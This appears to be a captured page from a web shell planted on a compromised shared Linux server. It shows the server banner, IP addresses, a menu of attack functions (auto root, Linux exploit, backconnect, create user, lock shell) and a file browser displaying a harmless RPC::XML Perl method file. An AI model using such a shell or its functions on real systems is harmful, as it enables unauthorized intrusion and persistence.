Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
perl5 /
RPC /
XML /
[ HOME SHELL ]
Name
Size
Permission
Action
Parser
[ DIR ]
drwxr-xr-x
Client.pm
31.26
KB
-rw-r--r--
Parser.pm
9.82
KB
-rw-r--r--
ParserFactory.pm
8.6
KB
-rw-r--r--
Procedure.pm
41.71
KB
-rw-r--r--
Server.pm
94.56
KB
-rw-r--r--
identity.xpl
858
B
-rw-r--r--
introspection.xpl
3.19
KB
-rw-r--r--
listMethods.xpl
1.66
KB
-rw-r--r--
methodHelp.xpl
1.85
KB
-rw-r--r--
methodSignature.xpl
1.99
KB
-rw-r--r--
multicall.xpl
3.25
KB
-rw-r--r--
status.xpl
4.46
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : methodHelp.xpl
<?xml version="1.0" encoding="iso-8859-1"?> <!DOCTYPE methoddef SYSTEM "rpc-method.dtd"> <!-- Generated automatically by make_method 1.15 Any changes made here will be lost. --> <methoddef> <name>system.methodHelp</name> <version>1.2</version> <signature>string string</signature> <signature>array array</signature> <help> Return the help text (such as this) associated with the specified method(s). If a STRING parameter specifying the method name is passed, the return value will be a STRING. If multiple methods are queried by passing an ARRAY of STRING values, then the return value will be an ARRAY of STRING values, as well. </help> <code language="perl"> <![CDATA[ #!/usr/bin/perl ############################################################################### # # Sub Name: methodHelp # # Description: Retrieve any help text for the specified methods. # # Arguments: NAME IN/OUT TYPE DESCRIPTION # $srv in ref Server object instance # $arg in ref/sc Listref or scalar specification # # Globals: None. # # Environment: None. # # Returns: Success: string or listref # Failure: fault object # ############################################################################### sub methodHelp { use strict; my $srv = shift; my $arg = shift; my $name = $srv->{method_name}; my @list = (ref $arg) ? @$arg : ($arg); my @results = (); my $method; for (@list) { if (ref($method = $srv->get_method($_)) and (! $method->hidden)) { push(@results, $method->help() || ''); } else { return RPC::XML::fault->new(302, "$name: Method $_ unknown"); } } return (ref $arg) ? \@results : $results[0]; } __END__ ]]></code> </methoddef>
Close